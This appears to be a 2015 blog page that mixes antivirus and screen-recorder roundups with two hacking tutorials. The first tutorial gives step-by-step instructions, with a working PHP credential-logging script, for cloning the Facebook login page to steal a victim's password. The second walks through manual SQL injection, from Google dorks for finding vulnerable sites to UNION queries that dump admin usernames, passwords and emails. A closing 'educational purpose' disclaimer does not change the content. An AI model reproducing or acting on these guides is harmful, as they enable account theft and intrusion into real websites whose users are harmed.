Saturday 31 January 2015

Top 6 Antivirus

                                             
In the digital era we are living in, almost every one is a regular user of the worldwide web either for downloading stuff, checking emails or for just socializing. Subsequently threats like trojans, spyware, malware, worms and key loggers have become common place today which not only attack your personal computer, but also corrupt the Windows operating system leading to a system crash and loss of vital information and data.
Thus to proactively curtail such threats from invading your personal computer, anti-virus software applications have been designed to keep at bay potential threats from sneaking into your computer through downloaded content from the internet.
Installation of such anti-virus applications in every computer has become indispensable of late to restrict the ever-increasing threats from entering your system which could negatively impact performance of your system and subsequently the dreaded blue screen of death. Listed below are the 6 best antivirus applications of 2014 for Windows operating system.

Best Antivirus Applications Of 2014

1. Kaspersky Antivirus

Best Antivirus 2014 Kaspersky Antivirus
This is the number 1, state-of-the-art and cutting edge PC security application available in the market today. The rich feature set of this application includes the cutting edge exploit prevention or the “EP” engine which provides outstanding scanning results to its users.
Kaspersky has become sort of household name in the industry with excellent ratings for the afore-mentioned features towards user friendliness and effective all round protection. The application has been received well in the market and has been accredited by leading companies.
Kaspersky Antivirus is one of the most technologically advanced product available in the market today. The software has rightly figured on top of this list and would be the right choice to protect your computer from the ever-increasing threat from malware.
Some of the advantages of using Kaspersky Antivirus are, affordable pricing licensed for single user and 3 users, protects your computer from all external threats, scanning is quite effective and faster, detects and prevents threats, viruses and malware from sneaking into your system, keeps working quietly in the background, comes with a free of cost 30-day virus scan and complete security, and is readily available at all retail and online stores with a license validity of 1 year.

2. Bitdefender Antivirus Plus

Bitdefender Antivirus Plus
Another top-notch and industry leading antivirus application is the Bitdefender Antivirus Plus, which is specifically designed to adapt itself to the specifications of the system and perform security checks in the most optimized way possible.
Technically speaking, 1 of the top internet security suites money can buy, Bitdefender Antivirus Plus 2014 also offers a host of additional features which all work together to prolong and enhance the life and performance of your Windows operated personal computer. Though the application is loaded with features, it is programmed to kick-start itself and work in the background unobtrusively day in and day out.
Few of the advantages of using the Bitdefender Antivirus Plus are, scanning time taken by the antivirus has been vastly reduced with faster optimum results and complete post scan report generation, incorporates the latest cutting edge technology, “Photon” ensuring complete and effective protection to your personal computer, downloadable free of cost 30-day trial version of the application and purchase of the licensed version valid for 365 days after the trial period is done affording total peace of mind.

3. Norton Antivirus Plus

Norton Antivirus Plus
Norton Antivirus Plus is an all time favorite contender for reliable PC security developed by Symantec. Norton Antivirus Plus offers all round protection to your computer from all external threats including viruses and other spyware and malware.
The application is feature dense including advanced proactive vulnerability protection, anti phishing and link scanning capabilities. It is extremely effective in identifying threats and offers round the clock 24×7 protection to your personal computer. The trademark “Norton Antivirus” has become sort of household name reputed for its simplicity and barebones usage of computer resources and has carved a name for itself in the industry.
Symantec is a widely recognized defence software program developer and regularly makes every effort to enhance and upgrade the software application they provide to their clients. The company is one among the few which pays heed to the voice of the customer in the form of feedback to improve its application in terms of effectiveness and user friendliness.
Some of the advantages of using Norton Antivirus Plus 2014 are it restricts internet worms at the point of entry, blocks hackers from accessing sensitive data in your system, operates unobtrusively in the background offering total protection to your system, comes with a 15-day free of cost downloadable trial version and there after purchase of a fully licensed version valid for 360 days.

4. AVG Antivirus

Top Antivirus 2014 - AVG Antivirus
Although AVG Antivirus is a free to use application, it offers a highly effective security platform to your Windows operated system with a user-friendly and easy to navigate interface. The paid version of this antivirus application is highly optimized for the latest Windows operating systems like Windows 7, 8, and 8.1.
Besides the paid version of the software comes with a load of additional features to ramp up the performance level of your personal computer. AVG Antivirus acts as a rapid performance booster of your system, shields your system from hackers and online spammers, it is extremely easy to utilize and operates in the background silently without slowing down your system hogging valuable resources.
AVG Antivirus is available in the form of free and paid versions. The free version works well, but the paid is loaded with additional features at an affordable cost.

5. Avast Pro Antivirus

Avast Pro Antivirus
Avast Pro is a world-renowned antivirus application and comes with a set of helpful tools to provide complete security by eliminating all external threats to your Windows operated personal computer. Automatic scanning happens at user scheduled time intervals.
The automatic update features of virus definitions makes Avast Pro one of the top security systems for your personal computer. The antivirus application comes with a “Do Not Track” feature which increases the level of privacy for several leading web browsers.
Avast Pro Antivirus protects critical and sensitive information in your system from hackers by restricting access to your computer, curtails malicious time-consuming email scams, comes with the safe zone which acts as virtual window preventing larceny of banking data base. The company offers a downloadable 30-day free of cost trial version with a fully featured licensed version valid for one year from the date of installation and activation of the application.

6. F-Secure Antivirus

F-Secure Antivirus
F-Secure Antivirus is also an effective and powerful antivirus application available in the market that removes malware, spyware, viruses, and any form of external threat to your computer. F-Secure Antivirus comes with an auto update feature with a user-friendly interface making it one of the most sought after antivirus applications today.
F-Secure Antivirus systematically checks all incoming email to identify any potential threats, automatically restricts all tracking cookies, ramps up the performance level of your system, comes with a 30-day free-to-try offer and there after purchase of the licensed version valid for a period of 2 years.
These are the 6 best antivirus applications available in the market for 2014 for Windows 7, 8 and 8.1 operated personal computers and laptops. We request you to weigh the pros and cons of each software judiciously and opt for the best software program for to shield your PC and laptops from the exponentially multiplying and ever looming threat from virus and other malicious malware.

Top 10 Best Free Screen Recording Software For Windows

                     
1. Icecream Screen Recorder (Free)
Icecream Screen Recorder, which comes from Icecream Apps, is a completely free tool to record and capture screen. With wide support for Windows OS, ranging from Windows 2000 to Windows 8, Icecream Screen Recorder is a good solution for every Windows-based PC user. If area selection feature of Icecream Screen Recorder lets you have your focus on, what you want, drawing panel will help you add ‘creative’ touch to the screenshot or recording. In addition to these, hotkey support, audio settings, screenshot to URL, clipboard feature, project history are notable features of Icecream Screen Recorder.
2. ActivePresenter (Free)
If you’re planning something huge with screen recording, say educating or tutorials, ActivePresenter will be a superb companion for you. Coming from Atomi Systems, ActivePresenter focuses on making screenshots and recordings bit more interactive that they will be useful while explaining. For instance, to make things easily explainable, this tool is offering a feature to insert interactive elements like callouts, voiceover, annotations, graphics etc. At the same time, its support for SCORM-complaint Learning Management Systems suits its role as a corporate training tool as well. In addition to free version, professional and standard editions are available.
3. CamStudio (Free)
CamStudio is a widely used tool for screen recording and capturing and has broken a number of records when we do take the case of downloads. Despite the fact that CamStudio does not offer many features, its features are, indeed, a bunch of noticeable ones. For instance, while using CamStudio to capture and record your PC screen, you’ll be able to hide your curser screen, get sound from multiple sources, etc.
4. Snagit (Premium)
Snagit, yet another amazing product from TechSmith, has been helping a number of professionals and individuals to capture and record their PC screen for multiple purposes. Although there is a free trial, Snagit is actually a paid tool, to buy which you have to spend big. Powerful editing tools, free tech support, integration with cloud-based services, ability to set hotkeys, etc are what make Snagit a top tool when it comes to screen recording. However, after all, it is paid software, though it is worth what you pay.
5. EZVID (Free)
Are you looking for a screen-recording tool that can be used to record videos and instantly upload them to YouTube? If so, EZVID can be your perfect choice. Best part of EZVID is that you do not have to find an external video editor; it’s so because EZVID comes with an integrated video editor. Resembling the case of most tools in the list, EZVID is also a free tool to use. Speed control, speech synthesis etc are also noticeable features of this tool. It supports Windows XP to Windows 8.
6. Jing (Free)
TechSmith knows that there are some, who cannot afford Snagit. That may be why TechSmith has made Jing, a small yet effective tool for screen capturing tool, available free. Jing does not come with high quality, feature-rich and productive editor and other stuff, but it lets you plan, record and share videos in a matter of seconds. Though being free, you can grab free tech support feature from TechSmith. However, we would like to add that Jing will not be a sufficient choice if you are planning to do some BIG screen recording and capturing works. Nevertheless, just like you do in Snagit, you can set up hotkeys and make things quicker.
7. Webinaria (Free & Open Source)
If you are an open-source lover and to find an open-source product for screen recording and capturing, Webinaria is your optimum answer. Using this Windows-based application, you will be able to create Flash videos of PC recording as well as add your own voice commentary using record feature. Although not much big in amount, Webinaria offers some sorts of editing features like insertion of text. Also, it can let you set certain hotkeys. After all, Webinaria is an open source product, and be proud to use it.
8. Camtasia Studio (Premium)
Well, Camtasia studio is the third product from TechSmith in this list and the second premium product. Aim of this tool is to simplify screen recording and video editing possible for everyone, and we should say it has succeeded to do so, that too in a smaller time. Since Camtasia is a really powerful tool, you will not find any difficulty in recording the screen of your Windows (a Mac version is also available, by the way). Some of new features such as cross-platform screen recording, integration with Google Drive and TechSmith Fuse are really impressive, indeed.
Rylstim Screen Recorder is a simple-enough tool to record what is happening in your PC screen. Once you have done with installation of this recorder, you have to select codec, frame rate and location where you would like to store the file and just hit ‘Start Recording’. Rylstim Screen Recorder will give you the result video once you have finished this recording process — simple as that. And, of course, Rylstim Screen Recorder is absolutely free and you can even get a portable version.
10. Screenr (Free)
Here comes the tenth one and we will have a twist! Unlike abovementioned tools, Screenr has nothing to do with PC or installation, but it works solely based on your web browser. The only thing you have to make sure is that Java has been installed in your PC. Thus, when you want to record, let it be any device, go to Screenr.com and start recording.

How to hack Facebook with phishing page


Steps to create a phishing page:

1) Go to the Facebook page ,and then right click on the page, You will see the option “view page source”,click on it.
2) Now a new tab will open which contain a source code,
Select and COPY all the code and paste it in a notepad.
3) Now open the notepad and press CTRL+F,and type ACTION.
4) You will have to find a text which looks like :

action="https://www.facebook.com/login.php?login_attempt=1

5) Delete all the text written in red colour and instead of it write post.php.then it will look like :
action="post.php"

6) Now save it on your desktop with the name index.htm
7) Now your phishing page is ALMOST READY.
8) Open a new NOTEPAD and save the given data with the name post.php

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9) You have two files now one is index.htm and another is post.php
Remember file extension(.php) is important.
10) Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11) I prefer u to use 000webhost because it will be easy to use.
12) You have to make a account in that
13) Now go control panel ,then on file manager.
14) After that a new window will pop up,Now go to public_html.
15) Delete the file named default.php, After that upload two files that we created (index.htm and post.php)
Upload them one by  one .
16) Now the last step click on view of index.htm it will look same as facebook page.
17) Copy the URL of that page and send this link to your victim,when your victim try to login in to it with the username and password.
The page redirectly connect to facebook. and you will be now able to see his password.
18) Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
19) Click on view now u will have your friend's password and email id.


This is a simple trick to hack any Facebook password account by phishing page.

If you are not able to create a phishing page then I will provide you a video tutorial link
Comment below if you have any problem in any step


Phishing is a ILLEGAL activity!
You can make phishing page for Facebook and also you can make phishing page of any website by following SIMILAR steps

How to hack a website using SQL Injection(Manually)

 Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. If you are unfamiliar with the term "dorks",

Dorks are website URLs that are possibly vulnerable. In SQL injection these dorks look like this:


allinurl:*.php?txtCodiInfo=
inurl:read.php?=
inurl:”ViewerFrame?Mode=”
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:page?id=
This will be inputted into Google's search bar and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:

Code:

http://www.example.com/page.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

Code:

http://www.example.com/page.php?id=1'
or
http://www.example.com/page.php?id='1
After pressing enter, if this website returns an error such as the following:

Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5

Or something similar, this means it's vulnerable to injection.
Determining the amount of columns
If we want to use commands and get results we must know how many columns there are on a website.
To find the number of columns we write a query with incrementing values until we get an error, like this:

Code:

http://www.example.com/page.php?id=1 ORDER BY 1-- <---No error
http://www.example.com/page.php?id=1 ORDER BY 2-- <---No error
http://www.example.com/page.php?id=1 ORDER BY 3-- <---No error
http://www.example.com/page.php?id=1 ORDER BY 4-- <---No error
http://www.example.com/page.php?id=1 ORDER BY 5-- <---ERROR!

This means that there are four columns!

DON'T FORGET TO INCLUDE THE DOUBLE NULL (-) AFTER THE QUERY.

VERY IMPORTANT!
Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we will use the UNION and SELECT queries while keeping the double null (--) at the end of the string.

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,2,3,4--

Don't forget to put the extra null(-) in between the "=" sign and the value (the number).

page.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4.

If we look back to the end of Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2 as an example). The command should look like this:

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method is used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:

Result : 5.1.44-community-log

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Finding the database

To find the database we use a query like the one below:

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,concat(database()),3,4--

You now have the name of the database! Congratulations. Copy and paste the name somewhere safe, we'll need it for later.


This is the fun part where we will find the usernames, emails and passwords!

Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!

Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s),

tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex.

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.

2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".

Hex/Char Converter

http://www.swingnote.com/tools/texttohex.php

3. Click convert.

4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code:

http://www.example.com/page.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon ( which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

Code:

http://www.example.com/admin
http://www.example.com/adminlogin
http://www.example.com/modlogin
http://www.example.com/moderator




This is Only for EDUCATIONAL purpose
We might not be held responsible for any misuse of this tutorial